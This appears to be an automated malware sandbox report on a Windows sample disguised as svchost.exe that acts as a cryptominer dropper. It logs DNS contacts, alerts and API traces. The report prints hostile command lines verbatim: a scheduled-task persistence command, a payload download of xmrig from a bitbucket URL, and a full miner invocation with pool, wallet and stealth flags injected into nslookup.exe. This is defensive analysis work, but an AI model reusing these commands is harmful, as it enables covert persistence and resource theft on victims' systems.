popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

svchost.exe

Generic Malware Code injection Socket Escalate priviledges Create Service KeyLogger DNS PE64 AntiDebug BitCoin PE File AntiVM
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Aug. 15, 2021, 12:33 p.m. Aug. 15, 2021, 12:40 p.m.
Size 42.0KB
Type PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
MD5 4197eeb783ac6250fe918d469d0805f0
SHA256 f43b25a5501033f574f0467cdf7534f50cdbec94c3d8a173a80ee9f54fce55eb
CRC32 F4B56224
ssdeep 768:g2khNnCxRoB30kHmiCvkSrFJV+0JqK6ecvMIcfat30Qi9EW3tyC+eJK:IfCxRoB3H33Sh+0MEc0xAkVftTJK
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE64 - (no description)
  • Generic_Malware_Zero - Generic Malware

Name Response Post-Analysis Lookup
sanctam.net
A 185.65.135.248
185.65.135.248
bitbucket.org
A 104.192.141.1
104.192.141.1
pool.hashvault.pro
A 131.153.76.130
131.153.76.130
IP Address Status Action
104.192.141.1 Active Moloch
131.153.76.130 Active Moloch
164.124.101.2 Active Moloch
185.65.135.248 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49204 -> 185.65.135.248:58899 906200022 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49205 -> 104.192.141.1:443 906200022 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLS 1.2
192.168.56.101:49205
104.192.141.1:443 		C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA unknown=Private Organization, unknown=US, unknown=Delaware, serialNumber=3928449, C=US, ST=California, L=San Francisco, O=Atlassian, Inc., OU=Bitbucket, CN=bitbucket.org 4e:6a:4c:3b:82:15:ef:df:97:38:5e:50:ef:b9:86:42:84:3b:89:f0
TLS 1.2
192.168.56.101:49204
185.65.135.248:58899 		C=US, O=Let's Encrypt, CN=R3 CN=sanctam.net 38:bc:f2:94:62:8a:02:9e:90:64:d5:0f:bc:00:83:12:36:86:2c:2a
TLS 1.3
192.168.56.101:49208
131.153.76.130:80 		None None None

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: SUCCESS: The scheduled task "svchost" has successfully been created.
console_handle: 0x0000000000000007
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features GET method with no useragent header suspicious_request GET https://bitbucket.org/Sanctam/sanctam/raw/d2123dc19ea65d0fdce7b5d17328d978c42b18cc/includes/xmrig
request GET https://bitbucket.org/Sanctam/sanctam/raw/d2123dc19ea65d0fdce7b5d17328d978c42b18cc/includes/xmrig
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2020
region_size: 1441792
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000007b0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2020
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000890000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2020
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1321000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2020
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef19bb000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2020
region_size: 1703936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002140000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2020
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002260000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2020
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2020
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2020
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2020
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2020
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2020
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2020
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2020
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2020
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2020
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2020
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2020
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1324000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2020
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1324000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2020
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1324000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2020
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1324000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2020
region_size: 655360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2020
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91b9a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91c4c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91c76000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91c50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91bac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91cc0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91b9b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91bbb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91b92000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91bec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91bbd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91cc1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91baa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91d00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91d01000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91cc2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91cc3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91cc4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91cc5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91cc6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91cc7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91d02000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91bed000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
description sihost64.exe tried to sleep 120 seconds, actually delayed analysis time by 120 seconds
file C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe
cmdline schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"'
cmdline "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit
cmdline cmd /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: cmd
parameters: /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit
filepath: cmd
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe
parameters:
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe
1 1 0
Time & API Arguments Status Return Repeated

Process32FirstW

 snapshot_handle: 0x0000000000000228
process_name: [System Process]
process_identifier: 0
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: System
process_identifier: 4
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: smss.exe
process_identifier: 224
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: csrss.exe
process_identifier: 300
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: wininit.exe
process_identifier: 348
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: csrss.exe
process_identifier: 364
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: winlogon.exe
process_identifier: 396
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: services.exe
process_identifier: 440
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: lsass.exe
process_identifier: 456
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: lsm.exe
process_identifier: 464
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: svchost.exe
process_identifier: 568
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: svchost.exe
process_identifier: 640
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: svchost.exe
process_identifier: 700
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: svchost.exe
process_identifier: 776
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: svchost.exe
process_identifier: 824
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: audiodg.exe
process_identifier: 892
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: svchost.exe
process_identifier: 968
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: svchost.exe
process_identifier: 264
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: spoolsv.exe
process_identifier: 820
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: svchost.exe
process_identifier: 292
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: svchost.exe
process_identifier: 1192
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: srvany.exe
process_identifier: 1244
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: taskhost.exe
process_identifier: 1284
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: KMService.exe
process_identifier: 1324
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: conhost.exe
process_identifier: 1376
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: sppsvc.exe
process_identifier: 1800
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: svchost.exe
process_identifier: 1876
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: dwm.exe
process_identifier: 1496
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: explorer.exe
process_identifier: 1848
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: pw.exe
process_identifier: 2816
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: SearchIndexer.exe
process_identifier: 2940
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: pw.exe
process_identifier: 1852
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: taskhost.exe
process_identifier: 2036
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: sihost64.exe
process_identifier: 812
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: WmiPrvSE.exe
process_identifier: 2344
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: nslookup.exe
process_identifier: 872
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000228
process_name: taskhost.exe
process_identifier: 2140
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
section {u'size_of_data': u'0x0000a000', u'virtual_address': u'0x00002000', u'entropy': 7.922992522731928, u'name': u'.text', u'virtual_size': u'0x00009f70'} entropy 7.92299252273 description A section with a high entropy has been found
entropy 0.963855421687 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

Process32NextW

 snapshot_handle: 0x0000000000000234
process_name: taskhost.exe
process_identifier: 2140
0 0

Process32NextW

 snapshot_handle: 0x0000000000000234
process_name: taskhost.exe
process_identifier: 2140
0 0

Process32NextW

 snapshot_handle: 0x0000000000000234
process_name: taskhost.exe
process_identifier: 2140
0 0

Process32NextW

 snapshot_handle: 0x0000000000000234
process_name: taskhost.exe
process_identifier: 2140
0 0

Process32NextW

 snapshot_handle: 0x0000000000000234
process_name: taskhost.exe
process_identifier: 2140
0 0

Process32NextW

 snapshot_handle: 0x0000000000000234
process_name: taskhost.exe
process_identifier: 2140
0 0

Process32NextW

 snapshot_handle: 0x0000000000000234
process_name: taskhost.exe
process_identifier: 2140
0 0

Process32NextW

 snapshot_handle: 0x0000000000000234
process_name: taskhost.exe
process_identifier: 2140
0 0

Process32NextW

 snapshot_handle: 0x0000000000000234
process_name: taskhost.exe
process_identifier: 2140
0 0

Process32NextW

 snapshot_handle: 0x0000000000000128
process_name: taskhost.exe
process_identifier: 2140
0 0

Process32NextW

 snapshot_handle: 0x0000000000000128
process_name: taskhost.exe
process_identifier: 2140
0 0

Process32NextW

 snapshot_handle: 0x0000000000000128
process_name: taskhost.exe
process_identifier: 2140
0 0

Process32NextW

 snapshot_handle: 0x0000000000000128
process_name: taskhost.exe
process_identifier: 2140
0 0

Process32NextW

 snapshot_handle: 0x0000000000000128
process_name: taskhost.exe
process_identifier: 2140
0 0
url https://xmrig.com/wizard
url https://xmrig.com/benchmark/%s
url https://xmrig.com/docs/algorithms
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Create a windows service rule Create_Service
description Perform crypto currency mining rule BitCoin
description Escalate priviledges rule Escalate_priviledges
description Run a KeyLogger rule KeyLogger
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Checks for the presence of known debug tools rule anti_dbgtools
description Bypass DEP rule disable_dep
cmdline schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"'
cmdline "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit
cmdline cmd /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit
cmdline C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=49XarhMHsp18ZAs9SiucnGHv3LcK7qChbLKquEQftqmbXayAcpYVdHr5Dy6Z7n8EKeKJzjDcms3dJfpC2S2jMGLcFaWBZHG --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --tls --cinit-stealth
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 872
region_size: 7745536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140000000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000324
1 0 0
cmdline schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"'
cmdline "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit
cmdline cmd /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit
Time & API Arguments Status Return Repeated

CreateServiceW

 service_start_name:
start_type: 3
password:
display_name: WinRing0_1_2_0
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Libs\WR64.sys
service_name: WinRing0_1_2_0
filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Libs\WR64.sys
desired_access: 983551
service_handle: 0x00000000225b16c0
error_control: 1
service_type: 1
service_manager_handle: 0x00000000225b1540
1 576394944 0
file C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe
Time & API Arguments Status Return Repeated

WriteProcessMemory

